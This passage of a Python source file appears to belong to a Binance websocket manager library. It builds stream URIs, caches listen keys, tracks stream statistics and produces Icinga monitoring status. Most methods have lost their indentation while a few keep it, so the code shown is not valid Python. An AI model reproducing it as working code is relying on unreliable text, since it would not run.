                        uri = self.websocket_base_uri + "ws/" + str(response['listenKey'])
                        # log variant with the listenKey masked unless secrets are allowed in logs
                        uri_hidden_secret = self.websocket_base_uri + "ws/" + self.replaced_secrets_text
                        if self.show_secrets_in_logs is True:
                            logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
                                         ", " + str(markets) + ", " + str(symbols) + ") - result: " + uri)
                        else:
                            logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
                                         ", " + str(markets) + ", " + str(symbols) + ") - result: " +
                                         uri_hidden_secret)
                        self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
                        return uri
                    except KeyError:
                        logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
                                         + str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
                                         "create URI!!")
                        return False
                    except TypeError:
                        logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
                                         + str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
                                         "create URI!!")
                        return False
                else:
                    logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
                                     str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create "
                                     "URI!!")
                    return False
            else:
                # without a stream_id no listenKey can be acquired
                logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
                                 str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create URI!!")
                return False
        elif "!bookTicker" in channels or "!bookTicker" in markets:
            if stream_id:
                self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
            return self.websocket_base_uri + "ws/!bookTicker"
        elif "arr" in channels or "$all" in markets:
            if stream_id:
                self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
            return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
        elif "arr" in markets or "$all" in channels:
            if stream_id:
                self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
            return self.websocket_base_uri + "ws/" + channels[0] + "@" + markets[0]
        elif self.is_exchange_type("dex"):
            # a 41-43 char alnum market is treated as the DEX wallet address
            if re.match(r'[a-zA-Z0-9]{41,43}', markets[0]) is not None:
                try:
                    if self.stream_list[stream_id]['dex_user_address'] is False:
                        self.stream_list[stream_id]['dex_user_address'] = markets[0]
                    if self.stream_list[stream_id]['dex_user_address'] != markets[0]:
                        logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
                                      str(markets) + ", " + ", " + str(symbols) + ") - Error: once set, the "
                                      "dex_user_address is not allowed to get changed anymore!")
                        return False
                except KeyError:
                    pass
                add_payload = {"method": "subscribe",
                               "topic": channels[0],
                               "address": markets[0]}
                payload.append(add_payload)
                if stream_id:
                    self.stream_list[stream_id]['payload'] = payload
                    self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
                return self.websocket_base_uri + "ws/" + markets[0]
            elif markets[0] != "" and channels[0] != "":
                return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
            else:
                logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
                              str(markets) + ", " + ", " + str(symbols) + ") - Error: not able to create websocket "
                              "URI for DEX")
                return False
    # multiplexed streams from here on
    if self.is_exchange_type("dex"):
        # DEX multiplex: plain "ws" endpoint, subscriptions are sent as payload after connect
        query = "ws"
        if stream_id:
            payload = self.create_payload(stream_id, "subscribe", channels=channels, markets=markets)
            self.stream_list[stream_id]['payload'] = payload
            self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
        return self.websocket_base_uri + str(query)
    else:
        query = "stream?streams="
        # determine the suffix for broadcast ("!...") entries: default "@arr",
        # or e.g. "@arr@3000ms" when an "arr@..." variant was provided
        final_market = "@arr"
        market = ""
        channel = ""
        for market in markets:
            if "arr@" in market:
                final_market = "@" + market
        final_channel = "@arr"
        for channel in channels:
            if "arr@" in channel:
                final_channel = "@" + channel
        for channel in channels:
            if channel == "!userData":
                logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
                              str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
                              "'outboundAccountInfo' in a multi channel socket! "
                              "Unfortunately Binance only stream it in a single stream socket! ./"
                              "Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
                              "initiate an extra connection.")
                return False
        for market in markets:
            if market == "!userData":
                logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
                              str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
                              "'outboundAccountInfo' in a multi channel socket! "
                              "Unfortunatly Binance only stream it in a single stream socket! ./"
                              "Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
                              "initiate an extra connection.")
                return False
        # NOTE(review): `channel`/`market` here are the LAST values left over from the loops above,
        # so the URI only carries one stream name; presumably the full subscription set is applied
        # via subscribe_to_stream() below - confirm against that method
        if "!" in channel:
            query += channel + final_market
        elif "!" in market:
            query += market + final_channel
        else:
            query += market.lower() + "@" + channel
        try:
            if self.subscribe_to_stream(stream_id, markets=markets, channels=channels) is False:
                sys.exit(1)
        except KeyError:
            pass
        logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
                     str(markets) + ", " + ", " + str(symbols) + ") - Created websocket URI for stream_id=" +
                     str(stream_id) + " is " + self.websocket_base_uri + str(query))
        return self.websocket_base_uri + str(query)
def delete_listen_key_by_stream_id(self, stream_id):
"""
Delete a binance listen_key from a specific !userData stream
:param stream_id: id of a !userData stream
:type stream_id: uuid
"""
try:
if self.stream_list[stream_id]['listen_key'] is not False:
logging.info("BinanceWebSocketApiManager.delete_listen_key_by_stream_id(" + str(stream_id) + ")")
self.restclient.delete_listen_key(stream_id)
except KeyError:
return False
def delete_stream_from_stream_list(self, stream_id):
"""
Delete a stream from the stream_list
Even if a stream crashes or get stopped, its data remains in the BinanceWebSocketApiManager till you stop the
BinanceWebSocketApiManager itself. If you want to tidy up the stream_list you can use this method.
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logging.info("BinanceWebSocketApiManager.delete_stream_from_stream_list(" + str(stream_id) + ")")
return self.stream_list.pop(stream_id, False)
def fill_up_space_left(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the left side
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while len(blanks_pre) < demand_of_blanks:
blanks_pre += filling
blanks_post = filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_centered(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars`
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while (len(blanks_pre)+len(blanks_post)) < demand_of_blanks:
blanks_pre += filling
if (len(blanks_pre) + len(blanks_post)) < demand_of_blanks:
blanks_post += filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_right(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the right side
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = " "
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string))
while len(blanks_post) < demand_of_blanks-1:
blanks_pre = filling
blanks_post += filling
string = blanks_pre + str(string) + blanks_post
return string[0:demand_of_chars]
def get_active_stream_list(self):
"""
Get a list of all active streams
:return: set or False
"""
# get the stream_list without stopped and crashed streams
stream_list_with_active_streams = {}
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
stream_list_with_active_streams[stream_id] = self.stream_list[stream_id]
try:
if len(stream_list_with_active_streams) > 0:
return stream_list_with_active_streams
except KeyError:
return False
except UnboundLocalError:
return False
def get_all_receives_last_second(self):
"""
Get the number of all receives of the last second
:return: int
"""
all_receives_last_second = 0
last_second_timestamp = int(time.time()) - 1
for stream_id in self.stream_list:
try:
all_receives_last_second += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][
last_second_timestamp]
except KeyError:
pass
return all_receives_last_second
def get_errors_from_endpoints(self):
"""
Get all the stored error messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_error
def get_binance_api_status(self):
"""
Get used_weight, last status_code and the timestamp of the last status update
:return: dict
"""
return self.binance_api_status
def get_current_receiving_speed(self, stream_id):
"""
Get the receiving speed of the last second in Bytes
:return: int
"""
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp] > 0:
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = \
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp]
except TypeError:
return 0
except KeyError:
return 0
try:
current_receiving_speed = self.stream_list[stream_id]['transfer_rate_per_second']['speed']
except KeyError:
current_receiving_speed = 0
return current_receiving_speed
def get_current_receiving_speed_global(self):
"""
Get the receiving speed of the last second in Bytes from all streams!
:return: int
"""
current_receiving_speed = 0
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError as error_msg:
logging.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
for stream_id in temp_stream_list:
current_receiving_speed += self.get_current_receiving_speed(stream_id)
return current_receiving_speed
@staticmethod
def get_date_of_timestamp(timestamp):
"""
Convert a timestamp into a readable date/time format for humans
:param timestamp: provide the timestamp you want to convert into a date
:type timestamp: timestamp
:return: str
"""
date = str(datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC'))
return date
def get_exchange(self):
"""
Get the name of the used exchange like "binance.com" or "binance.org-testnet"
:return: str
"""
return self.exchange
@staticmethod
def get_human_bytesize(bytes, suffix=""):
"""
Convert the bytes to something readable
:param bytes: amount of bytes
:type bytes: int
:param suffix: add a string after
:type suffix: str
:return:
"""
if bytes > 1024 * 1024 * 1024 *1024:
bytes = str(round(bytes / (1024 * 1024 * 1024 * 1024), 3)) + " tB" + suffix
elif bytes > 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024), 2)) + " gB" + suffix
elif bytes > 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024), 2)) + " mB" + suffix
elif bytes > 1024:
bytes = str(round(bytes / 1024, 2)) + " kB" + suffix
else:
bytes = str(bytes) + " B" + suffix
return bytes
@staticmethod
def get_human_uptime(uptime):
"""
Convert a timespan of seconds into hours, days, ...
:param uptime: Uptime in seconds
:type uptime: int
:return:
"""
if uptime > (60 * 60 * 24):
uptime_days = int(uptime / (60 * 60 * 24))
uptime_hours = int(((uptime - (uptime_days * (60 * 60 * 24))) / (60 * 60)))
uptime_minutes = int((uptime - ((uptime_days * (60 * 60 * 24)) + (uptime_hours * 60 * 60))) / 60)
uptime_seconds = int(
uptime - ((uptime_days * (60 * 60 * 24)) + ((uptime_hours * (60 * 60)) + (uptime_minutes * 60))))
uptime = str(uptime_days) + "d:" + str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(
int(uptime_seconds)) + "s"
elif uptime > (60 * 60):
uptime_hours = int(uptime / (60 * 60))
uptime_minutes = int((uptime - (uptime_hours * (60 * 60))) / 60)
uptime_seconds = int(uptime - ((uptime_hours * (60 * 60)) + (uptime_minutes * 60)))
uptime = str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(int(uptime_seconds)) + "s"
elif uptime > 60:
uptime_minutes = int(uptime / 60)
uptime_seconds = uptime - uptime_minutes * 60
uptime = str(uptime_minutes) + "m:" + str(int(uptime_seconds)) + "s"
else:
uptime = str(int(uptime)) + " seconds"
return uptime
@staticmethod
def get_latest_release_info():
"""
Get infos about the latest available release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/oliver-zehentleitner/unicorn-binance-websocket-api/'
'releases/latest')
latest_release_info = respond.json()
return latest_release_info
except Exception:
return False
@staticmethod
def get_latest_release_info_check_command():
"""
Get infos about the latest available `check_lucit_collector` release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/LUCIT-Development/check_lucit_collector.py/'
'releases/latest')
return respond.json()
except Exception:
return False
def get_latest_version(self):
"""
Get the version of the latest available release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or last timestamp is older 1 hour
if self.last_update_check_github['status'] is None or \
(self.last_update_check_github['timestamp']+(60*60) < time.time()):
self.last_update_check_github['status'] = self.get_latest_release_info()
if self.last_update_check_github['status']:
try:
return self.last_update_check_github['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_latest_version_check_command(self):
"""
Get the version of the latest available `check_lucit_collector.py` release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or last timestamp is older 1 hour
if self.last_update_check_github_check_command['status'] is None or \
(self.last_update_check_github_check_command['timestamp'] + (60 * 60) < time.time()):
self.last_update_check_github_check_command['status'] = self.get_latest_release_info_check_command()
if self.last_update_check_github_check_command['status']:
try:
return self.last_update_check_github_check_command['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_limit_of_subscriptions_per_stream(self):
"""
Get the number of allowed active subscriptions per stream (limit of binance API)
:return: int
"""
return self.max_subscriptions_per_stream
def get_number_of_all_subscriptions(self):
"""
Get the amount of all stream subscriptions
:return: inf
"""
subscriptions = 0
try:
active_stream_list = copy.deepcopy(self.get_active_stream_list())
if active_stream_list:
for stream_id in active_stream_list:
subscriptions += active_stream_list[stream_id]['subscriptions']
self.all_subscriptions_number = subscriptions
except TypeError:
return self.all_subscriptions_number
except RuntimeError:
return self.all_subscriptions_number
return subscriptions
def get_number_of_free_subscription_slots(self, stream_id):
"""
Get the number of free subscription slots (max allowed subscriptions - subscriptions) of a specific stream
:return: int
"""
free_slots = self.max_subscriptions_per_stream - self.stream_list[stream_id]['subscriptions']
return free_slots
def get_listen_key_from_restclient(self, stream_id, api_key, api_secret, symbols=False):
"""
Get a new or cached (<30m) listen_key
:param stream_id: provide a stream_id
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if (self.stream_list[stream_id]['start_time'] + self.stream_list[stream_id]['listen_key_cache_time']) > \
time.time() or (self.stream_list[stream_id]['last_static_ping_listen_key'] +
self.stream_list[stream_id]['listen_key_cache_time']) > time.time():
# listen_key is not older than 30 min
if self.stream_list[stream_id]['listen_key'] is not False:
response = {'listenKey': self.stream_list[stream_id]['listen_key']}
return response
# no cached listen_key or listen_key is older than 30 min
# acquire a new listen_key:
response = self.restclient.get_listen_key(stream_id)
if response:
# save and return the valid listen_key
try:
self.stream_list[stream_id]['listen_key'] = str(response['listenKey'])
return response
except KeyError:
# no valid listen_key, but a response from endpoint
return response
except TypeError:
return response
else:
# no valid listen_key
return False
def get_most_receives_per_second(self):
"""
Get the highest total receives per second value
:return: int
"""
return self.most_receives_per_second
def get_number_of_streams_in_stream_list(self):
"""
Get the number of streams that are stored in the stream_list
:return: int
"""
return len(self.stream_list)
def get_number_of_subscriptions(self, stream_id):
"""
Get the number of subscriptions of a specific stream
:return: int
"""
count_subscriptions = 0
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel \
or channel == "orders" \
or channel == "accounts" \
or channel == "transfers" \
or channel == "allTickers" \
or channel == "allMiniTickers" \
or channel == "blockheight":
count_subscriptions += 1
continue
else:
for market in self.stream_list[stream_id]['markets']:
if "!" in market \
or market == "orders" \
or market == "accounts" \
or market == "transfers" \
or market == "allTickers" \
or market == "allMiniTickers" \
or market == "blockheight":
count_subscriptions += 1
else:
count_subscriptions += 1
return count_subscriptions
def get_keep_max_received_last_second_entries(self):
"""
Get the number of how much received_last_second entries are stored till they get deleted
:return: int
"""
return self.keep_max_received_last_second_entries
def get_monitoring_status_icinga(self, check_command_version=False, warn_on_update=True):
"""
Get status and perfdata to monitor and collect metrics with ICINGA/Nagios
status: OK, WARNING, CRITICAL
- WARNING: on restarts, available updates
- CRITICAL: crashed streams
perfdata:
- average receives per second since last status check
- average speed per second since last status check
- total received bytes since start
- total received length since start
- stream_buffer size
- stream_buffer length
- reconnects
- uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict (text, time, return_code)
"""
result = self.get_monitoring_status_plain(check_command_version=check_command_version,
warn_on_update=warn_on_update)
if len(result['update_msg']) > 0 or len(result['status_msg']) > 0:
text_msg = " -" + str(result['status_msg']) + str(result['update_msg'])
else:
text_msg = ""
check_message = "BINANCE WEBSOCKETS (" + self.exchange + ") - " + result['status_text'] + ": O:" + \
str(result['active_streams']) + \
"/R:" + str(result['restarting_streams']) + "/C:" + str(result['crashed_streams']) + "/S:" + \
str(result['stopped_streams']) + text_msg + " | " + \
"active streams=" + str(result['active_streams']) + ";;;0 " + \
"average_receives_per_second=" + str(result['average_receives_per_second']) + \
";;;0 current_receiving_speed_per_second=" + str(result['average_speed_per_second']) + \
"KB;;;0 total_received_length=" + str(result['total_received_length']) + "c;;;0 total_" \
"received_size=" + str(result['total_received_mb']) + "MB;;;0 stream_buffer_size=" + \
str(result['stream_buffer_mb']) + "MB;;;0 stream_buffer_length=" + \
str(result['stream_buffer_items']) + ";;;0 reconnects=" + str(result['reconnects']) + "c;;;0 " \
"uptime_days=" + str(result['uptime']) + "c;;;0"
status = {'text': check_message,
'time': int(result['timestamp']),
'return_code': result['return_code']}
return status
    def get_monitoring_status_plain(self, check_command_version=False, warn_on_update=True):
        """
        Get plain monitoring status data:
        active_streams, crashed_streams, restarting_streams, stopped_streams, return_code, status_text,
        timestamp, update_msg, average_receives_per_second, average_speed_per_second, total_received_mb,
        stream_buffer_items, stream_buffer_mb, reconnects, uptime

        :param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
        :type check_command_version: False or str
        :param warn_on_update: set to `False` to disable the update warning
        :type warn_on_update: bool
        :return: dict
        """
        # Start from a neutral "everything OK" result set; counters are
        # filled in below, return_code follows the Nagios convention
        # (0=OK, 1=WARNING, 2=CRITICAL).
        result = {}
        result['active_streams'] = 0
        result['crashed_streams'] = 0
        result['restarting_streams'] = 0
        result['highest_restart_per_stream_last_hour'] = 0
        result['return_code'] = 0
        result['status_text'] = "OK"
        result['status_msg'] = ""
        result['stopped_streams'] = 0
        result['timestamp'] = time.time()
        result['update_msg'] = ""
        # averages below are computed over the period since the last check
        time_period = result['timestamp'] - self.last_monitoring_check
        timestamp_last_hour = time.time() - (60*60)
        # Probe UnicornFy for available updates; a missing module means "no
        # update info", an outdated module (method missing) is treated as
        # "update available".
        try:
            from unicorn_fy.unicorn_fy import UnicornFy
            unicorn_fy = UnicornFy()
            is_update_available_unicorn_fy = unicorn_fy.is_update_availabe()
        except ModuleNotFoundError:
            logging.critical("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy not installed!")
            is_update_available_unicorn_fy = False
        except AttributeError:
            logging.error("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy outdated!")
            is_update_available_unicorn_fy = True
        if check_command_version:
            is_update_available_check_command = self.is_update_availabe_check_command(
                check_command_version=check_command_version)
        else:
            # no caller version provided -> assume an update is available
            is_update_available_check_command = True
        # Determine the highest per-stream restart count within the last hour
        # (used for the WARNING/CRITICAL thresholds further down).
        for stream_id in self.stream_list:
            stream_restarts_last_hour = 0
            for reconnect in self.stream_list[stream_id]['logged_reconnects']:
                if reconnect > timestamp_last_hour:
                    stream_restarts_last_hour += 1
            if stream_restarts_last_hour > result['highest_restart_per_stream_last_hour']:
                result['highest_restart_per_stream_last_hour'] = stream_restarts_last_hour
        # Count streams per status; "crashed" is matched as a substring
        # because crashed statuses carry extra detail text.
        for stream_id in self.stream_list:
            if self.stream_list[stream_id]['status'] == "running":
                result['active_streams'] += 1
            elif self.stream_list[stream_id]['status'] == "stopped":
                result['stopped_streams'] += 1
            elif self.stream_list[stream_id]['status'] == "restarting":
                result['restarting_streams'] += 1
            elif "crashed" in self.stream_list[stream_id]['status']:
                result['crashed_streams'] += 1
        # Build the update message for every combination of pending updates;
        # any pending update downgrades the status to WARNING (if enabled).
        # NOTE(review): in the `is_update_available_unicorn_fy` branch below,
        # `unicorn_fy` is only bound when the import above succeeded - the
        # flag is False in the ModuleNotFoundError case, so that branch is
        # unreachable then.
        if self.is_update_availabe() and is_update_available_unicorn_fy and is_update_available_check_command:
            result['update_msg'] = " Update available: UNICORN Binance WebSocket API, UnicornFy and " \
                                   "check_lucit_collector.py!"
            if warn_on_update is True:
                result['status_text'] = "WARNING"
                result['return_code'] = 1
        elif self.is_update_availabe() and is_update_available_unicorn_fy:
            result['update_msg'] = " Update available: UNICORN Binance WebSocket API and UnicornFy"
            if warn_on_update is True:
                result['status_text'] = "WARNING"
                result['return_code'] = 1
        elif self.is_update_availabe() and is_update_available_check_command:
            result['update_msg'] = " Update available: UNICORN Binance WebSocket API and check_lucit_collector.py!"
            if warn_on_update is True:
                result['status_text'] = "WARNING"
                result['return_code'] = 1
        elif is_update_available_unicorn_fy and is_update_available_check_command:
            result['update_msg'] = " Update available: UnicornFy and check_lucit_collector.py!"
            if warn_on_update is True:
                result['status_text'] = "WARNING"
                result['return_code'] = 1
        elif self.is_update_availabe():
            result['update_msg'] = " Update " + str(self.get_latest_version()) + " available!"
            if warn_on_update is True:
                result['status_text'] = "WARNING"
                result['return_code'] = 1
        elif is_update_available_unicorn_fy:
            result['update_msg'] = " Update UnicornFy " + str(unicorn_fy.get_latest_version()) + " available!"
            if warn_on_update is True:
                result['status_text'] = "WARNING"
                result['return_code'] = 1
        elif is_update_available_check_command:
            result['update_msg'] = " Update `check_lucit_collector.py` " + \
                                   str(self.get_latest_version_check_command()) + " available!"
            if warn_on_update is True:
                result['status_text'] = "WARNING"
                result['return_code'] = 1
        # Health thresholds (checked after the update block so they can
        # override a WARNING): >=10 restarts/hour or any crashed stream is
        # CRITICAL, >=3 restarts/hour is WARNING.
        if result['highest_restart_per_stream_last_hour'] >= 10:
            result['status_text'] = "CRITICAL"
            result['return_code'] = 2
            result['status_msg'] = " Restart rate per stream last hour: " + \
                                   str(result['highest_restart_per_stream_last_hour'])
        elif result['crashed_streams'] > 0:
            result['status_text'] = "CRITICAL"
            result['return_code'] = 2
        elif result['highest_restart_per_stream_last_hour'] >= 3:
            result['status_text'] = "WARNING"
            result['return_code'] = 1
            result['status_msg'] = " Restart rate per stream last hour: " + \
                                   str(result['highest_restart_per_stream_last_hour'])
        # Perfdata: deltas since the last monitoring check, totals since
        # start, current stream_buffer usage and overall uptime in days.
        result['average_receives_per_second'] = ((self.total_receives - self.monitoring_total_receives) /
                                                 time_period).__round__(2)
        result['average_speed_per_second'] = (((self.total_received_bytes - self.monitoring_total_received_bytes) /
                                               time_period) / 1024).__round__(2)
        result['total_received_mb'] = (self.get_total_received_bytes() / (1024 * 1024)).__round__(2)
        result['total_received_length'] = self.total_receives
        result['stream_buffer_items'] = str(self.get_stream_buffer_length())
        result['stream_buffer_mb'] = (self.get_stream_buffer_byte_size() / (1024 * 1024)).__round__(4)
        result['reconnects'] = self.get_reconnects()
        # remember the counters of this check as baseline for the next one
        self.monitoring_total_receives = self.get_total_receives()
        self.monitoring_total_received_bytes = self.get_total_received_bytes()
        self.last_monitoring_check = result['timestamp']
        result['uptime'] = ((result['timestamp'] - self.start_time) / (60*60*24)).__round__(3)
        return result
def get_process_usage_memory(self):
"""
Get the used memory of this process
:return: str
"""
process = psutil.Process(os.getpid())
memory = self.get_human_bytesize(process.memory_info()[0])
return memory
def get_process_usage_cpu(self):
"""
Get the used cpu power of this process
:return: int
"""
try:
cpu = psutil.cpu_percent(interval=None)
except OSError as error_msg:
logging.error(f"BinanceWebSocketApiManager.get_process_usage_cpu() - OSError - error_msg: {str(error_msg)}")
return False
return cpu
def get_process_usage_threads(self):
"""
Get the amount of threads that this process is using
:return: int
"""
threads = threading.active_count()
return threads
def get_reconnects(self):
"""
Get the number of total reconnects
:return: int
"""
return self.reconnects
def get_request_id(self):
"""
Get a unique `request_id`
:return: int
"""
with self.request_id_lock:
self.request_id += 1
return self.request_id
def get_result_by_request_id(self, request_id=False, timeout=10):
"""
Get the result related to the provided `request_id`
:param request_id: if you run `get_stream_subscriptions()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_stream_subscriptions>`_
it returns a unique `request_id` - provide it to this method to receive the result.
:type request_id: stream_id (uuid)
:param timeout: seconds to wait to receive the result. If not there it returns 'False'
:type timeout: int
:return: `result` or False
"""
if request_id is False:
return False
wait_till_timestamp = time.time() + timeout
while wait_till_timestamp >= time.time():
for result in self.ringbuffer_result:
result_dict = json.loads(result)
if result_dict['id'] == request_id:
return result
return False
def get_results_from_endpoints(self):
"""
Get all the stored result messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_result
def get_ringbuffer_error_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_error_max_size
def get_ringbuffer_result_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_result_max_size
def get_start_time(self):
"""
Get the start_time of the BinanceWebSocketApiManager instance
:return: timestamp
"""
return self.start_time
def get_stream_buffer_byte_size(self):
"""
Get the current byte size estimation of the stream_buffer
:return: int
"""
total_received_bytes = self.get_total_received_bytes()
total_receives = self.get_total_receives()
stream_buffer_length = self.get_stream_buffer_length()
return round(total_received_bytes / total_receives * stream_buffer_length)
def get_stream_buffer_length(self):
"""
Get the current number of items in all stream_buffer
:return: int
"""
number = 0
number += len(self.stream_buffer)
for stream_buffer_name in self.stream_buffers:
number += len(self.stream_buffers[stream_buffer_name])
return number
def get_stream_id_by_label(self, stream_label=False):
"""
Get the stream_id of a specific stream by stream label
:param stream_label: stream_label of the stream you search
:type stream_label: str
:return: stream_id or False
"""
if stream_label:
for stream_id in self.stream_list:
if self.stream_list[stream_id]['stream_label'] == stream_label:
return stream_id
return False
def get_stream_info(self, stream_id):
"""
Get all infos about a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: set
"""
current_timestamp = time.time()
try:
temp_stream_list = copy.deepcopy(self.stream_list[stream_id])
except RuntimeError:
logging.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: RuntimeError")
return self.get_stream_info(stream_id)
except KeyError:
logging.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: KeyError")
return False
if temp_stream_list['last_heartbeat'] is not None:
temp_stream_list['seconds_to_last_heartbeat'] = \
current_timestamp - self.stream_list[stream_id]['last_heartbeat']
if temp_stream_list['has_stopped'] is not False:
temp_stream_list['seconds_since_has_stopped'] = \
int(current_timestamp) - int(self.stream_list[stream_id]['has_stopped'])
try:
self.stream_list[stream_id]['processed_receives_statistic'] = self.get_stream_statistic(stream_id)
except ZeroDivisionError:
pass
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = self.get_current_receiving_speed(stream_id)
return temp_stream_list
def get_stream_label(self, stream_id=False):
"""
Get the stream_label of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: str or False
"""
if stream_id:
return self.stream_list[stream_id]['stream_label']
else:
return False
def get_stream_subscriptions(self, stream_id, request_id=False):
"""
Get a list of subscriptions of a specific stream from Binance endpoints - the result can be received via
the `stream_buffer` and is also added to the results ringbuffer - `get_results_from_endpoints()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_results_from_endpoints>`_
to get all results or use `get_result_by_request_id(request_id)
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_result_by_request_id>`_
to get a specific one!
This function is supported by CEX endpoints only!
Info: https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md#listing-subscriptions
:param stream_id: id of a stream
:type stream_id: uuid
:param request_id: id to use for the request - use `get_request_id()` to create a unique id. If not provided or
`False`, then this method is using `get_request_id()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_request_id>`_
automatically.
:type request_id: int
:return: request_id (int)
"""
if request_id is False:
request_id = self.get_request_id()
if self.is_exchange_type('dex'):
logging.error("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") DEX websockets dont support the listing of subscriptions! Request not "
"sent!")
return False
elif self.is_exchange_type('cex'):
payload = {"method": "LIST_SUBSCRIPTIONS",
"id": request_id}
self.stream_list[stream_id]['payload'].append(payload)
